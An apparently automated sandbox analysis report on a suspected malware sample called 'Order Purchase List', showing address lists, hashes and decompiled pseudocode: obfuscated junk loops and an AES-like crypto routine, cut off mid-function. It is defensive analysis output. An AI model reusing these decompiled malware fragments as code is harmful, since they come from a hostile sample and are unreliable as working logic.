0x0041bc46
0x0041bc4c
0x0041bc52
0x0041bc58
0x0041bc5f
0x0041bc6a
0x0041bc70
0x0041bc7a
0x0041bc80
0x0041bc8a
0x0041bc8b
0x0041bc92
0x0041bc98
0x0041bc98
0x0041bc98
0x0041bc9e
0x0041bca5
0x0041bcac
0x0041bcb2
0x0041bcb3
0x0041bcba
0x0041bcc0
0x0041bcc7
0x0041bcc8
0x0041bcc9
0x0041bccf
0x0041bcd5
0x0041bcdb
0x0041bce0
0x0041bce6
0x0041bce8
0x0041bce8
0x0041bc7a
0x0041bc6a
0x0041bc4c
0x0041b8d6
0x0041b8d6
0x0041b8dc
0x0041b8e2
0x0041b8e8
0x0041b8e9
0x0041b8f2
0x0041b8f8
0x0041b8fe
0x0041b904
0x0041b90a
0x0041b90b
0x0041b90c
0x0041b90d
0x0041b914
0x0041b915
0x0041b920
0x0041b922
0x0041b928
0x0041b92e
0x0041b934
0x0041b936
0x0041b942
0x0041b956
0x0041b95c
0x0041b95d
0x0041b963
0x0041b970
0x0041b978
0x0041b97e
0x0041b984
0x0041b990
0x0041b996
0x0041b99d
0x0041b99f
0x0041b9a5
0x0041b9ac
0x0041b9ad
0x0041b9b3
0x0041b9b9
0x0041b9be
0x0041b9c2
0x0041b9c3
0x0041b9c9
0x0041b9cf
0x0041b9d5
0x0041b9e1
0x0041b9e4
0x0041b9eb
0x0041b9f7
0x0041ba02
0x0041ba09
0x0041ba15
0x0041ba22
0x0041ba28
0x0041ba29
0x0041ba2c
0x0041ba37
0x0041ba38
0x0041ba3f
0x0041ba45
0x0041ba46
0x0041ba5c
0x0041ba63
0x0041ba69
0x0041ba6f
0x0041ba76
0x0041ba7c
0x0041ba7d
0x0041ba83
0x0041ba89
0x0041ba8f
0x0041ba90
0x0041baa2
0x0041babc
0x0041bace
0x0041bad4
0x0041bad9
0x0041badf
0x0041baec
0x0041baf3
0x0041baf9
0x0041bafb
0x0041bafb
0x0041bb02
0x0041bb0f
0x0041bb16
0x0041bb16
0x0041bb22
0x0041bb2f
0x0041bb35
0x0041bb3e
0x0041bb4a
0x0041bb5c
0x0041bb62
0x0041bb67
0x0041bb6d
0x0041ba46
0x0041ba2c
0x0041b9c3
0x0041b9ad
0x0041b934
0x00000000

Strings

Wh;, xrefs: 0041BAC2

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID: Wh;
API String ID: 0-697344040
Opcode ID: 30c3cdf64a0e16891ed6ec6456ff55bd0c2f36fd265e3a2e635b707bd4d8e89b
Instruction ID: 3e9cf0f36eef0e2f9d19349e8cea96b43c9b48e6b60b1b2907ab40c45e49bfcd
Opcode Fuzzy Hash: 30c3cdf64a0e16891ed6ec6456ff55bd0c2f36fd265e3a2e635b707bd4d8e89b
Instruction Fuzzy Hash: AF914E32A18384CFD706DF39C899A813FB2F752B24B48435FD5A2931D2E738115ACB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB78, Relevance: 1.4, Strings: 1, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E0041BB78() {
				signed char _t34;
				signed char _t35;
				signed int _t37;
				signed char _t47;
				signed char _t49;
				signed char _t57;
				signed int _t58;
				void* _t60;
				void* _t61;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				signed int _t71;
				signed int _t73;

				asm("adc ecx, 0x97177ae9");
				_t35 = _t34 |  *0x72939210;
				_pop(_t71);
				_t49 = (_t47 ^  *0x64d6212) - 8;
				_t66 = _t65 & 0x49c5c31b;
				 *0x2e216e12 =  *0x2e216e12 << 0x46;
				_t43 = 0x83b26005;
				asm("adc bl, 0xf2");
				if( *0x2e216e12 >= 0 &&  *0xd1c5417c * 0xd0cc <= 0) {
					__edi = __edi ^  *0xea6e70d1;
					__ah = __ah & 0x0000000a;
					_push( *0x2c9cc396);
				}
				L1:
				_pop( *0x2a529409);
				_t43 = _t43 + 0x78c1d903;
				_t49 = _t49 -  *0x550d1e30;
				_push(_t64);
				asm("sbb bl, 0xd0");
				asm("adc [0x5e9ea6c9], bl");
				_t37 = _t37 &  *0xee0c8d29;
				asm("adc ebx, [0x311d046c]");
				asm("sbb ecx, 0xc989e08c");
				asm("lodsd");
				_push(_t43);
				_t64 = _t64 - 1;
				asm("rcl byte [0x3fbd9008], 0xe");
				_t66 = _t66 - 1;
				_t58 = _t58 - 0xb1242c2e;
				if((_t35 & 0x1ab4b105) < 0) {
					asm("sbb [0xed0dd771], edx");
					 *0x98a9087 =  *0x98a9087 - _t66;
					asm("adc ecx, [0xd3d3b435]");
					if( *0x98a9087 <= 0) {
						asm("adc [0x8d574f77], ebx");
						_pop(_t64);
						_push( *0x74104a36);
						asm("lodsd");
						_t71 = _t71 ^ 0x79383833;
						asm("rcr dword [0xc5d262bf], 0x61");
						asm("rol dword [0x640a03eb], 0x1e");
						asm("sbb ebp, [0x76fe1429]");
						asm("sbb bl, [0x711e2f82]");
						_push( *0x53b27e09);
						_t37 = 0x287ca813 -  *0x99051ecf;
						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
						_t43 = 0xa;
						_t49 = ((_t49 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
						asm("rol byte [0xb64a5934], 0x33");
						_t58 = _t58;
						if(_t58 < 0) {
							asm("sbb edx, [0x6aaf0a71]");
							_push(0x811d5329);
							_t66 = _t66 - 1;
							_t64 = _t64 - 1;
							if(_t64 < 0) {
								_t49 = _t49 ^  *0x11030f71;
								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
								_t37 = _t37 + 0xa0;
								asm("rol byte [0x50590312], 0x7d");
								asm("sbb dh, [0x5305c024]");
								_t35 = _t35 & 0x799f3c83;
								_pop(_t60);
								_pop( *0xfdc51691);
								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
								asm("sbb [0x8a15626c], eax");
								_t58 = _t60 + 1;
								_t43 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
								if(_t43 < 0) {
									asm("stosb");
									asm("rcl byte [0x33670730], 0x95");
									 *0x614bdadb =  *0x614bdadb | _t64;
									_t66 = 0x8200a671;
									if( *0x614bdadb <= 0) {
										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
										asm("adc edx, [0xe73ac826]");
										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
										 *0xbd0901df =  *0xbd0901df >> 0x97;
										_t73 = _t71 - 1 +  *0x9c9eb206;
										_pop(_t61);
										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t35;
										 *0xe82cce68 =  *0xe82cce68 ^ _t66;
										 *0xe3cd41ea = _t35;
										_t43 = _t43 + 1;
										 *0x1f4f8938 =  *0x1f4f8938 ^ _t43;
										asm("rcr dword [0x3cb441f3], 0xf1");
										_t58 = (_t61 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
										asm("adc [0x704bccc9], cl");
										 *0xec116eb6 = _t35 -  *0x4c2f0d80;
										_t37 =  *0x38028e97;
										_t35 =  *0xad2fb260 * 0x81d;
										_push(_t73);
										 *0xfe811d01 = _t66 ^ 0xca1c871b;
										asm("movsw");
										_t71 =  *0x312dedfd;
										 *0x312dedfd = _t73;
										_t64 = _t64 + 1;
										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
										_t57 =  *0xd4d909d1;
										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
										 *0xf202931b =  *0xf202931b - _t57;
										_t49 = _t57 ^ 0x000000e6;
										_t66 =  *0x96049ebe;
										asm("adc ecx, [0x890ef031]");
										 *0xef5459e5 =  *0xef5459e5 ^ _t35;
										asm("sbb eax, 0x486a0e97");
										 *0xe78fc910 =  *0xe78fc910 - _t37;
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0041bb78
0x0041bb85
0x0041bb8b
0x0041bb8c
0x0041bb8f
0x0041bb9b
0x0041bba2
0x0041bba7
0x0041bbaa
0x0041bbca
0x0041bbd0
0x0041bbd3
0x0041bbdf
0x0041b8d6
0x0041b8d6
0x0041b8dc
0x0041b8e2
0x0041b8e8
0x0041b8e9
0x0041b8f2
0x0041b8f8
0x0041b8fe
0x0041b904
0x0041b90a
0x0041b90b
0x0041b90c
0x0041b90d
0x0041b914
0x0041b915
0x0041b920
0x0041b922
0x0041b928
0x0041b92e
0x0041b934
0x0041b936
0x0041b942
0x0041b956
0x0041b95c
0x0041b95d
0x0041b963
0x0041b970
0x0041b978
0x0041b97e
0x0041b984
0x0041b990
0x0041b996
0x0041b99d
0x0041b99f
0x0041b9a5
0x0041b9ac
0x0041b9ad
0x0041b9b3
0x0041b9b9
0x0041b9be
0x0041b9c2
0x0041b9c3
0x0041b9c9
0x0041b9cf
0x0041b9d5
0x0041b9e1
0x0041b9e4
0x0041b9eb
0x0041b9f7
0x0041ba02
0x0041ba09
0x0041ba15
0x0041ba22
0x0041ba28
0x0041ba29
0x0041ba2c
0x0041ba37
0x0041ba38
0x0041ba3f
0x0041ba45
0x0041ba46
0x0041ba5c
0x0041ba63
0x0041ba69
0x0041ba6f
0x0041ba76
0x0041ba7c
0x0041ba7d
0x0041ba83
0x0041ba89
0x0041ba8f
0x0041ba90
0x0041baa2
0x0041babc
0x0041bace
0x0041bad4
0x0041bad9
0x0041badf
0x0041baec
0x0041baf3
0x0041baf9
0x0041bafb
0x0041bafb
0x0041bb02
0x0041bb0f
0x0041bb16
0x0041bb16
0x0041bb22
0x0041bb2f
0x0041bb35
0x0041bb3e
0x0041bb4a
0x0041bb5c
0x0041bb62
0x0041bb67
0x0041bb6d
0x0041ba46
0x0041ba2c
0x0041b9c3
0x0041b9ad
0x0041b934
0x00000000

Strings

Wh;, xrefs: 0041BAC2

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID: Wh;
API String ID: 0-697344040
Opcode ID: 6e40854757242b2db8ac4c0d80fa4476227fdfa1255ec40d66d5ca9968501250
Instruction ID: 2d24da6d8678cbbe5c079d4f9382dae2200431e0499f410fed652bcee60a3b1c
Opcode Fuzzy Hash: 6e40854757242b2db8ac4c0d80fa4476227fdfa1255ec40d66d5ca9968501250
Instruction Fuzzy Hash: 0B713032A08384CFD306CF39C889B813FB2F352B64B48425FD5A2575E2D7791656CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041B8D6, Relevance: 1.4, Strings: 1, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 40%

			E0041B8D6() {
				signed int _t32;
				signed int _t33;
				void* _t44;
				signed char _t50;
				void* _t65;
				void* _t66;
				void* _t77;
				signed int _t78;
				void* _t80;
				void* _t81;
				signed int _t83;
				signed int _t89;
				signed int _t90;
				intOrPtr _t92;

				L0:
				_pop( *0x2a529409);
				asm("sbb bl, 0xd0");
				asm("adc [0x5e9ea6c9], bl");
				asm("adc ebx, [0x311d046c]");
				asm("sbb ecx, 0xc989e08c");
				asm("lodsd");
				_push(_t44 + 0x78c1d903);
				asm("rcl byte [0x3fbd9008], 0xe");
				_t81 = _t80 - 1;
				_t66 = _t65 - 0xb1242c2e;
				if((_t32 & 0x1ab4b105) < 0) {
					asm("sbb [0xed0dd771], edx");
					 *0x98a9087 =  *0x98a9087 - _t81;
					asm("adc ecx, [0xd3d3b435]");
					if( *0x98a9087 <= 0) {
						asm("adc [0x8d574f77], ebx");
						_pop(_t77);
						_push( *0x74104a36);
						asm("lodsd");
						_t90 = _t89 ^ 0x79383833;
						asm("rcr dword [0xc5d262bf], 0x61");
						asm("rol dword [0x640a03eb], 0x1e");
						asm("sbb ebp, [0x76fe1429]");
						asm("sbb bl, [0x711e2f82]");
						_push( *0x53b27e09);
						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
						asm("rol byte [0xb64a5934], 0x33");
						if(_t66 < 0) {
							asm("sbb edx, [0x6aaf0a71]");
							_push(0x811d5329);
							_t78 = _t77 - 1;
							if(_t78 < 0) {
								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
								asm("rol byte [0x50590312], 0x7d");
								asm("sbb dh, [0x5305c024]");
								_t33 = _t32 & 0x799f3c83;
								_pop( *0xfdc51691);
								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
								asm("sbb [0x8a15626c], eax");
								_t50 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
								if(_t50 < 0) {
									asm("stosb");
									asm("rcl byte [0x33670730], 0x95");
									 *0x614bdadb =  *0x614bdadb | _t78;
									_t83 = 0x8200a671;
									if( *0x614bdadb <= 0) {
										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
										asm("adc edx, [0xe73ac826]");
										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
										 *0xbd0901df =  *0xbd0901df >> 0x97;
										_t92 = _t90 - 1 +  *0x9c9eb206;
										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t33;
										 *0xe82cce68 =  *0xe82cce68 ^ _t83;
										 *0xe3cd41ea = _t33;
										 *0x1f4f8938 =  *0x1f4f8938 ^ _t50 + 0x00000001;
										asm("rcr dword [0x3cb441f3], 0xf1");
										asm("adc [0x704bccc9], cl");
										 *0xec116eb6 = _t33 -  *0x4c2f0d80;
										_push(_t92);
										 *0xfe811d01 = _t83 ^ 0xca1c871b;
										asm("movsw");
										 *0x312dedfd = _t92;
										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
										 *0xf202931b =  *0xf202931b -  *0xd4d909d1;
										asm("adc ecx, [0x890ef031]");
										 *0xef5459e5 =  *0xef5459e5 ^  *0xad2fb260 * 0x0000081d;
										asm("sbb eax, 0x486a0e97");
										 *0xe78fc910 =  *0xe78fc910 -  *0x38028e97;
									}
								}
							}
						}
					}
				}
				goto L0;
			}

0x0041b8d6
0x0041b8d6
0x0041b8e9
0x0041b8f2
0x0041b8fe
0x0041b904
0x0041b90a
0x0041b90b
0x0041b90d
0x0041b914
0x0041b915
0x0041b920
0x0041b922
0x0041b928
0x0041b92e
0x0041b934
0x0041b936
0x0041b942
0x0041b956
0x0041b95c
0x0041b95d
0x0041b963
0x0041b970
0x0041b978
0x0041b97e
0x0041b984
0x0041b996
0x0041b9a5
0x0041b9ad
0x0041b9b3
0x0041b9b9
0x0041b9c2
0x0041b9c3
0x0041b9cf
0x0041b9d5
0x0041b9e4
0x0041b9eb
0x0041b9f7
0x0041ba09
0x0041ba15
0x0041ba22
0x0041ba29
0x0041ba2c
0x0041ba37
0x0041ba38
0x0041ba3f
0x0041ba45
0x0041ba46
0x0041ba5c
0x0041ba63
0x0041ba69
0x0041ba6f
0x0041ba76
0x0041ba7d
0x0041ba83
0x0041ba89
0x0041ba90
0x0041baa2
0x0041bace
0x0041bad4
0x0041baec
0x0041baf3
0x0041baf9
0x0041bafb
0x0041bb0f
0x0041bb16
0x0041bb22
0x0041bb2f
0x0041bb4a
0x0041bb5c
0x0041bb62
0x0041bb67
0x0041bb6d
0x0041ba46
0x0041ba2c
0x0041b9c3
0x0041b9ad
0x0041b934
0x00000000

Strings

Wh;, xrefs: 0041BAC2

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID: Wh;
API String ID: 0-697344040
Opcode ID: 89f2f816299d6a76901ab0f58a9247b72810f4b45476aa439f871825cf0b4c03
Instruction ID: d5a88a8153257204d55b39bc351febb721ac014a0b6a69b3edffff066d93ae99
Opcode Fuzzy Hash: 89f2f816299d6a76901ab0f58a9247b72810f4b45476aa439f871825cf0b4c03
Instruction Fuzzy Hash: 6C512032A18384CFC306CF39C889B853BB2F752764748435FD5A297192D775125ACB89

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x00402fb0
0x00402fbf
0x00402fc8
0x00402fd6
0x00402fda
0x00402fe3
0x00402ff4
0x00402ff7
0x00402ffc
0x00403005
0x00403013
0x00403018
0x00403021
0x00403031
0x00403051
0x00403054
0x00403066
0x0040306b
0x00403080
0x0040309d
0x004030a0
0x004030b1
0x004030c6
0x004030e6
0x004030e9
0x004030fb
0x00403119
0x00403136
0x00403139
0x0040314b
0x00403160
0x00403166
0x0040316e
0x0040316f
0x00403172
0x00403180
0x00403190
0x004031a2
0x004031b4
0x004031d0
0x004031e3
0x004031f0
0x00403201
0x00403218
0x0040323a
0x0040323d
0x0040324e
0x00403269
0x00403280
0x00403283
0x00403295
0x0040329d
0x004032b2
0x004032cf
0x004032d2
0x004032e3
0x00403307
0x00403317
0x0040331a
0x0040332c
0x00403344
0x00403347
0x0040335a
0x00403367
0x00403379
0x00403391
0x004033b4
0x004033b7
0x004033c9
0x004033de
0x004033e4
0x004033e4
0x004033e7
0x004033e7
0x00403180
0x0040344b
0x00403454
0x00403462
0x004034c0
0x004034c9
0x004034d7
0x00403539
0x00403542
0x0040354f
0x00403552
0x0040359e
0x004035aa
0x004035b3
0x004035c0
0x004035c7

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 009F732F, Relevance: .3, Instructions: 291
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E009F732F(void* __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi, signed int __esi) {
				void* _t85;
				signed int _t88;
				signed char _t89;
				signed char _t90;
				signed char _t92;
				signed int _t94;
				signed char _t95;
				signed char _t96;
				signed char _t97;
				signed char _t98;
				signed char _t99;
				signed char _t101;
				signed char _t103;
				signed int _t104;
				signed int _t105;
				signed char _t106;
				signed char _t108;
				intOrPtr* _t109;
				signed char _t110;
				intOrPtr* _t111;
				signed char _t112;
				signed int _t113;
				signed char _t115;
				signed char _t116;
				intOrPtr* _t117;
				signed int _t118;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t125;
				signed int _t127;
				signed char _t128;
				signed char _t129;
				signed int _t131;
				signed int _t133;
				signed int _t135;
				signed char _t137;
				signed char _t139;
				void* _t141;
